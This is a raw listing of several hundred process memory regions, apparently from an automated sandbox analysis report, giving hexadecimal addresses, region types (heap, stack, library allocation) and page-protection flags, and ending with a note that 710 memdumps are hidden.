trusted library allocation
page read and write
13E3862A000
trusted library allocation
page read and write
7FF9BF740000
trusted library allocation
page read and write
2068657C000
heap
page read and write
7FF9BFE90000
trusted library allocation
page read and write
25D62B47000
heap
page read and write
7B5A7F000
stack
page read and write
13E384F3000
trusted library allocation
page read and write
1EC8FF00000
heap
page read and write
13E4F92B000
heap
page read and write
13E3825F000
trusted library allocation
page read and write
28904990000
heap
page read and write
7FF9BFBE0000
trusted library allocation
page read and write
13E3898D000
trusted library allocation
page read and write
13E38B4A000
trusted library allocation
page read and write
13E37559000
trusted library allocation
page read and write
25D62C44000
heap
page read and write
13E38639000
trusted library allocation
page read and write
7FF9BF766000
trusted library allocation
page read and write
7FF9BFC60000
trusted library allocation
page read and write
13E38963000
trusted library allocation
page read and write
13E38886000
trusted library allocation
page read and write
25D62B5C000
heap
page read and write
13E34C40000
trusted library allocation
page read and write
13E38C69000
trusted library allocation
page read and write
25D62C44000
heap
page read and write
13E378A5000
trusted library allocation
page read and write
76B69FE000
stack
page read and write
13E36BA1000
trusted library allocation
page read and write
18BBBA50000
heap
page read and write
13E34B74000
heap
page read and write
13E38C6F000
trusted library allocation
page read and write
20686490000
heap
page read and write
13E38A76000
trusted library allocation
page read and write
13E389AB000
trusted library allocation
page read and write
13E34C50000
heap
page read and write
13E38C66000
trusted library allocation
page read and write
13E3884D000
trusted library allocation
page read and write
13E38D73000
trusted library allocation
page read and write
13E36B30000
heap
page execute and read and write
13E378AB000
trusted library allocation
page read and write
13E3888F000
trusted library allocation
page read and write
13E384FC000
trusted library allocation
page read and write
13E46BB1000
trusted library allocation
page read and write
13E38627000
trusted library allocation
page read and write
20B552D0000
heap
page read and write
289049E7000
heap
page read and write
223E3B10000
heap
page read and write
13E378A8000
trusted library allocation
page read and write
20686586000
heap
page read and write
7FF9BFA80000
trusted library allocation
page read and write
13E4F804000
heap
page read and write
7B6C0F000
stack
page read and write
7FF9BF9F0000
trusted library allocation
page read and write
13E378B1000
trusted library allocation
page read and write
7FF9BFA50000
trusted library allocation
page read and write
13E38880000
trusted library allocation
page read and write
13E3771A000
trusted library allocation
page read and write
25D629A0000
heap
page read and write
7FF9BFD50000
trusted library allocation
page read and write
13E34C20000
trusted library allocation
page read and write
13E38514000
trusted library allocation
page read and write
7B5E7A000
stack
page read and write
7FF9BF520000
trusted library allocation
page read and write
7FF9BFAD0000
trusted library allocation
page read and write
7FF9BF524000
trusted library allocation
page read and write
13E3899C000
trusted library allocation
page read and write
AB303FE000
stack
page read and write
13E3898A000
trusted library allocation
page read and write
13E4EBAB000
heap
page read and write
7B6A02000
stack
page read and write
41F06FF000
stack
page read and write
223E5520000
heap
page read and write
13E3830F000
trusted library allocation
page read and write
20686815000
heap
page read and write
13E3819B000
trusted library allocation
page read and write
13E376F0000
trusted library allocation
page read and write
13E3874F000
trusted library allocation
page read and write
13E378C9000
trusted library allocation
page read and write
18BBB680000
heap
page read and write
7B6B4E000
stack
page read and write
13E38734000
trusted library allocation
page read and write
7FF9BF9A0000
trusted library allocation
page read and write
13E4F85E000
heap
page read and write
7FF9BFA30000
trusted library allocation
page read and write
13E3872B000
trusted library allocation
page read and write
13E38722000
trusted library allocation
page read and write
7FF9BF932000
trusted library allocation
page read and write
13E38401000
trusted library allocation
page read and write
13E389A8000
trusted library allocation
page read and write
7FF9BFDA0000
trusted library allocation
page read and write
13E38AC1000
trusted library allocation
page read and write
13E37896000
trusted library allocation
page read and write
7B6A4E000
stack
page read and write
13E38981000
trusted library allocation
page read and write
28904A5B000
heap
page read and write
7B5BFE000
stack
page read and write
13E38318000
trusted library allocation
page read and write
AD0637F000
stack
page read and write
7FF9BF860000
trusted library allocation
page read and write
13E38404000
trusted library allocation
page read and write
13E38B59000
trusted library allocation
page read and write
7FF9BFBA0000
trusted library allocation
page read and write
7FF9BF850000
trusted library allocation
page read and write
76B67FD000
stack
page read and write
25D62B45000
heap
page read and write
13E37383000
trusted library allocation
page read and write
13E4EC02000
heap
page read and write
223E3AC0000
heap
page read and write
13E34B80000
heap
page read and write
13E36F43000
trusted library allocation
page read and write
13E378C0000
trusted library allocation
page read and write
13E3860C000
trusted library allocation
page read and write
13E37875000
trusted library allocation
page read and write
20B53770000
heap
page read and write
AB306FF000
stack
page read and write
28904A24000
heap
page read and write
13E38517000
trusted library allocation
page read and write
13E38993000
trusted library allocation
page read and write
25D62B56000
heap
page read and write
13E38AA3000
trusted library allocation
page read and write
7FF9BF74A000
trusted library allocation
page read and write
25D62BD0000
heap
page read and write
7FF9BF940000
trusted library allocation
page execute and read and write
13E3874C000
trusted library allocation
page read and write
18BBB760000
heap
page read and write
13E3861B000
trusted library allocation
page read and write
25D62B1D000
heap
page read and write
13E3786F000
trusted library allocation
page read and write
13E384F6000
trusted library allocation
page read and write
7FF9BF760000
trusted library allocation
page read and write
7FF9BFAA0000
trusted library allocation
page read and write
7FF9BFD80000
trusted library allocation
page read and write
13E38865000
trusted library allocation
page read and write
13E38743000
trusted library allocation
page read and write
13E376E7000
trusted library allocation
page read and write
25D62BF0000
heap
page read and write
7FF9BF606000
trusted library allocation
page execute and read and write
7B6C8F000
stack
page read and write
13E4F8BF000
heap
page read and write
7B6079000
stack
page read and write
13E3817C000
trusted library allocation
page read and write
13E373C2000
trusted library allocation
page read and write
13E3831B000
trusted library allocation
page read and write
13E384F9000
trusted library allocation
page read and write
7FF9BFD10000
trusted library allocation
page read and write
7DF40DE60000
trusted library allocation
page execute and read and write
13E38B4D000
trusted library allocation
page read and write
13E38D7F000
trusted library allocation
page read and write
13E37947000
trusted library allocation
page read and write
13E381AE000
trusted library allocation
page read and write
13E38841000
trusted library allocation
page read and write
13E38407000
trusted library allocation
page read and write
13E376DE000
trusted library allocation
page read and write
25D62C00000
heap
page read and write
13E3899F000
trusted library allocation
page read and write
7FF9BF9E0000
trusted library allocation
page read and write
7FF9BF7D3000
trusted library allocation
page read and write
13E38C7B000
trusted library allocation
page read and write
13E38731000
trusted library allocation
page read and write
25D62B83000
heap
page read and write
13E38333000
trusted library allocation
page read and write
13E38180000
trusted library allocation
page read and write
13E38630000
trusted library allocation
page read and write
13E46BA1000
trusted library allocation
page read and write
13E38A9D000
trusted library allocation
page read and write
28904C65000
heap
page read and write
25D62C44000
heap
page read and write
7FF9BF98A000
trusted library allocation
page read and write
13E38A8E000
trusted library allocation
page read and write
7FF9BFEE0000
trusted library allocation
page execute and read and write
AB305FF000
stack
page read and write
25D62AA0000
heap
page read and write
7B5C7D000
stack
page read and write
D798D7E000
stack
page read and write
13E38321000
trusted library allocation
page read and write
13E38B6E000
trusted library allocation
page read and write
13E383F5000
trusted library allocation
page read and write
C140A7E000
stack
page read and write
13E3860F000
trusted library allocation
page read and write
41F03BE000
stack
page read and write
13E3789F000
trusted library allocation
page read and write
13E37565000
trusted library allocation
page read and write
7FF9BFB10000
trusted library allocation
page execute and read and write
AD062FD000
stack
page read and write
13E38990000
trusted library allocation
page read and write
13E4F931000
heap
page read and write
13E38D76000
trusted library allocation
page read and write
AD0617E000
stack
page read and write
AB30278000
stack
page read and write
13E37520000
trusted library allocation
page read and write
13E38C75000
trusted library allocation
page read and write
7FF9BFE50000
trusted library allocation
page read and write
13E38AAF000
trusted library allocation
page read and write
7FF9BFE62000
trusted library allocation
page read and write
13E4EBA0000
heap
page read and write
AB3047F000
stack
page read and write
7FF9BFA70000
trusted library allocation
page read and write
13E3840A000
trusted library allocation
page read and write
13E4F802000
heap
page read and write
7FF9BFCF0000
trusted library allocation
page read and write
20686520000
heap
page read and write
223E3B69000
heap
page read and write
289049E0000
heap
page read and write
25D62B15000
heap
page read and write
76B61E6000
stack
page read and write
13E3840D000
trusted library allocation
page read and write
25D62D0D000
heap
page read and write
13E3887D000
trusted library allocation
page read and write
13E3896F000
trusted library allocation
page read and write
7FF9BF952000
trusted library allocation
page read and write
13E37711000
trusted library allocation
page read and write
13E376E1000
trusted library allocation
page read and write
13E381AA000
trusted library allocation
page read and write
7FF9BF790000
trusted library allocation
page read and write
6FFBB7F000
stack
page read and write
7FF9BF8A0000
trusted library allocation
page read and write
2068654D000
heap
page read and write
20B537B4000
heap
page read and write
13E4F8FF000
heap
page read and write
25D62D00000
heap
page read and write
13E37553000
trusted library allocation
page read and write
1EC8FBAA000
heap
page read and write
13E36C1E000
trusted library allocation
page read and write
13E38883000
trusted library allocation
page read and write
13E383F8000
trusted library allocation
page read and write
13E38609000
trusted library allocation
page read and write
13E3831E000
trusted library allocation
page read and write
13E38523000
trusted library allocation
page read and write
7FF9BFC70000
trusted library allocation
page execute and read and write
7FF9BFE73000
trusted library allocation
page read and write
7FF9BFC10000
trusted library allocation
page read and write
13E38603000
trusted library allocation
page read and write
25D62B3C000
heap
page read and write
7B58FE000
stack
page read and write
7FF9BFAE0000
trusted library allocation
page read and write
7FF9BFA40000
trusted library allocation
page read and write
AB3067E000
stack
page read and write
13E3886B000
trusted library allocation
page read and write
13E389A2000
trusted library allocation
page read and write
13E36560000
trusted library allocation
page read and write
7FF9BF537000
trusted library allocation
page read and write
1EC8FB93000
heap
page read and write
13E378BA000
trusted library allocation
page read and write
7FF9BF7B0000
trusted library allocation
page read and write
7FF9BFD40000
trusted library allocation
page read and write
7FF9BF7A0000
trusted library allocation
page read and write
AB304FE000
stack
page read and write
13E384FF000
trusted library allocation
page read and write
25D62B69000
heap
page read and write
13E36F36000
trusted library allocation
page read and write
13E38C72000
trusted library allocation
page read and write
13E38987000
trusted library allocation
page read and write
13E366C0000
heap
page read and write
13E38B5F000
trusted library allocation
page read and write
25D62C44000
heap
page read and write
7FF9BF990000
trusted library allocation
page read and write
13E34BE0000
trusted library section
page read and write
20B53980000
heap
page read and write
C14097E000
stack
page read and write
13E3850B000
trusted library allocation
page read and write
AD0607E000
stack
page read and write
13E37374000
trusted library allocation
page read and write
13E38853000
trusted library allocation
page read and write
13E383DD000
trusted library allocation
page read and write
13E3788D000
trusted library allocation
page read and write
25D62AFD000
heap
page read and write
13E38749000
trusted library allocation
page read and write
13E38253000
trusted library allocation
page read and write
13E385F1000
trusted library allocation
page read and write
13E37EEE000
trusted library allocation
page read and write
7FF9BF9D0000
trusted library allocation
page read and write
13E364F0000
trusted library allocation
page read and write
13E383FE000
trusted library allocation
page read and write
13E4EBB9000
heap
page read and write
13E376FC000
trusted library allocation
page read and write
7B5B7F000
stack
page read and write
13E3896C000
trusted library allocation
page read and write
13E383E6000
trusted library allocation
page read and write
7FF9BFC00000
trusted library allocation
page read and write
289049C0000
heap
page read and write
13E383E9000
trusted library allocation
page read and write
20B53A00000
heap
page read and write
25D62B70000
heap
page read and write
13E36DC1000
trusted library allocation
page read and write
13E376EA000
trusted library allocation
page read and write
25D62AD0000
heap
page read and write
13E38D94000
trusted library allocation
page read and write
13E38862000
trusted library allocation
page read and write
13E38D79000
trusted library allocation
page read and write
13E3755C000
trusted library allocation
page read and write
13E34CD9000
heap
page read and write
13E38984000
trusted library allocation
page read and write
289049A0000
heap
page read and write
7FF9BFAB0000
trusted library allocation
page read and write
7FF9BFC20000
trusted library allocation
page read and write
76B68FE000
stack
page read and write
7FF9BFC30000
trusted library allocation
page read and write
13E37702000
trusted library allocation
page read and write
13E38859000
trusted library allocation
page read and write
13E4F91C000
heap
page read and write
13E376D8000
trusted library allocation
page read and write
13E38B53000
trusted library allocation
page read and write
7FF9BF780000
trusted library allocation
page read and write
7FF9BFE60000
trusted library allocation
page read and write
13E34CD6000
heap
page read and write
25D62C44000
heap
page read and write
13E37893000
trusted library allocation
page read and write
20B537F2000
heap
page read and write
76B64FE000
unkown
page read and write
13E383E3000
trusted library allocation
page read and write
13E4EC33000
heap
page read and write
13E38C63000
trusted library allocation
page read and write
13E37544000
trusted library allocation
page read and write
7FF9BF7F0000
trusted library allocation
page execute and read and write
13E38A8B000
trusted library allocation
page read and write
13E38B65000
trusted library allocation
page read and write
7FF9BFEF0000
trusted library allocation
page read and write
76B65FE000
stack
page read and write
13E38972000
trusted library allocation
page read and write
25D62B84000
heap
page read and write
7FF9BF770000
trusted library allocation
page read and write
C140BFE000
stack
page read and write
13E38746000
trusted library allocation
page read and write
13E38624000
trusted library allocation
page read and write
AD063FE000
stack
page read and write
13E38ABB000
trusted library allocation
page read and write
13E38D8B000
trusted library allocation
page read and write
7FF9BF640000
trusted library allocation
page execute and read and write
13E38D7C000
trusted library allocation
page read and write
18BBD390000
heap
page read and write
13E38D9A000
trusted library allocation
page read and write
13E38B50000
trusted library allocation
page read and write
13E4EBF2000
heap
page read and write
13E373AD000
trusted library allocation
page read and write
7FF9BFBB0000
trusted library allocation
page read and write
7FF9BF9E3000
trusted library allocation
page read and write
25D62B30000
heap
page read and write
20B53880000
heap
page read and write
13E38892000
trusted library allocation
page read and write
7FF9BF726000
trusted library allocation
page read and write
13E38B6B000
trusted library allocation
page read and write
13E378DE000
trusted library allocation
page read and write
13E37523000
trusted library allocation
page read and write
7FF9BF5DC000
trusted library allocation
page execute and read and write
C1408FE000
stack
page read and write
1EC8FD20000
heap
page read and write
7B5871000
stack
page read and write
18BBBA55000
heap
page read and write
206865A4000
heap
page read and write
13E38725000
trusted library allocation
page read and write
13E38262000
trusted library allocation
page read and write
7FF9BF970000
trusted library allocation
page read and write
13E38728000
trusted library allocation
page read and write
13E385F7000
trusted library allocation
page read and write
25D62B6E000
heap
page read and write
13E34C8D000
heap
page read and write
18BBB810000
heap
page read and write
13E38633000
trusted library allocation
page read and write
7FF9BF810000
trusted library allocation
page read and write
13E38966000
trusted library allocation
page read and write
13E38C84000
trusted library allocation
page read and write
13E37717000
trusted library allocation
page read and write
13E37547000
trusted library allocation
page read and write
13E34C00000
trusted library allocation
page read and write
C140878000
stack
page read and write
13E3883B000
trusted library allocation
page read and write
13E38B62000
trusted library allocation
page read and write
7FF9BFE8A000
trusted library allocation
page read and write
13E38D6A000
trusted library allocation
page read and write
13E38256000
trusted library allocation
page read and write
25D62B3C000
heap
page read and write
7FF9BF7A9000
trusted library allocation
page read and write
13E4F91E000
heap
page read and write
25D62D0D000
heap
page read and write
13E389A5000
trusted library allocation
page read and write
13E383EC000
trusted library allocation
page read and write
13E34C92000
heap
page read and write
13E38A97000
trusted library allocation
page read and write
76B66FE000
stack
page read and write
25D62B05000
heap
page read and write
7FF9BFB00000
trusted library allocation
page read and write
13E3756B000
trusted library allocation
page read and write
1EC8FBCE000
heap
page read and write
13E4EC0B000
heap
page read and write
13E38D91000
trusted library allocation
page read and write
13E38502000
trusted library allocation
page read and write
20686564000
heap
page read and write
25D62B34000
heap
page read and write
13E3850E000
trusted library allocation
page read and write
13E383D7000
trusted library allocation
page read and write
13E37D05000
trusted library allocation
page read and write
13E37380000
trusted library allocation
page read and write
13E38A88000
trusted library allocation
page read and write
D798C7C000
stack
page read and write
13E383FB000
trusted library allocation
page read and write
13E38189000
trusted library allocation
page read and write
7FF9BF820000
trusted library allocation
page read and write
223E3AD0000
heap
page read and write
13E38324000
trusted library allocation
page read and write
13E373B0000
trusted library allocation
page read and write
13E38AA6000
trusted library allocation
page read and write
28904C60000
heap
page read and write
25D62AF3000
heap
page read and write
13E373B6000
trusted library allocation
page read and write
13E4EC11000
heap
page read and write
13E378B7000
trusted library allocation
page read and write
13E376FF000
trusted library allocation
page read and write
13E365D0000
heap
page execute and read and write
25D62B49000
heap
page read and write
13E385FD000
trusted library allocation
page read and write
7FF9BF960000
trusted library allocation
page read and write
25D62B4F000
heap
page read and write
28906510000
heap
page read and write
13E38250000
trusted library allocation
page read and write
7FF9BF8B0000
trusted library allocation
page execute and read and write
AB302FE000
stack
page read and write
7FF9BF9B0000
trusted library allocation
page read and write
7FF9BFE40000
trusted library allocation
page read and write
7FF9BFA00000
trusted library allocation
page read and write
7B5DF6000
stack
page read and write
13E373C5000
trusted library allocation
page read and write
13E38838000
trusted library allocation
page read and write
C1409FE000
stack
page read and write
13E3819D000
trusted library allocation
page read and write
13E34B70000
heap
page read and write
13E46C06000
trusted library allocation
page read and write
25D62B4D000
heap
page read and write
13E38835000
trusted library allocation
page read and write
13E38B56000
trusted library allocation
page read and write
13E38B47000
trusted library allocation
page read and write
13E3789C000
trusted library allocation
page read and write
7FF9BF530000
trusted library allocation
page read and write
7FF9BFD60000
trusted library allocation
page read and write
13E3871F000
trusted library allocation
page read and write
13E37386000
trusted library allocation
page read and write
13E38C60000
trusted library allocation
page read and write
25D62C44000
heap
page read and write
13E4F83A000
heap
page read and write
13E37881000
trusted library allocation
page read and write
7FF9BFAC0000
trusted library allocation
page read and write
25D64540000
heap
page read and write
13E3886E000
trusted library allocation
page read and write
13E38B74000
trusted library allocation
page read and write
25D62B72000
heap
page read and write
13E38895000
trusted library allocation
page read and write
7FF9BF870000
trusted library allocation
page read and write
41F077E000
stack
page read and write
13E38AA9000
trusted library allocation
page read and write
7B5F7F000
stack
page read and write
13E38ABE000
trusted library allocation
page read and write
7FF9BF890000
trusted library allocation
page read and write
C140B7D000
stack
page read and write
7FF9BFBF0000
trusted library allocation
page read and write
7FF9BFEC0000
trusted library allocation
page read and write
13E38844000
trusted library allocation
page read and write
41F087F000
stack
page read and write
25D62A80000
heap
page read and write
13E38D88000
trusted library allocation
page read and write
13E37729000
trusted library allocation
page read and write
1EC8FB20000
heap
page read and write
13E38AAC000
trusted library allocation
page read and write
20B53A05000
heap
page read and write
13E34BC0000
heap
page read and write
13E4F8A4000
heap
page read and write
7FF9BF880000
trusted library allocation
page read and write
13E38247000
trusted library allocation
page read and write
13E378D8000
trusted library allocation
page read and write
13E4F909000
heap
page read and write
1EC8FB58000
heap
page read and write
25D62B64000
heap
page read and write
13E46C18000
trusted library allocation
page read and write
13E38850000
trusted library allocation
page read and write
There are 710 hidden memdumps, click here to show them.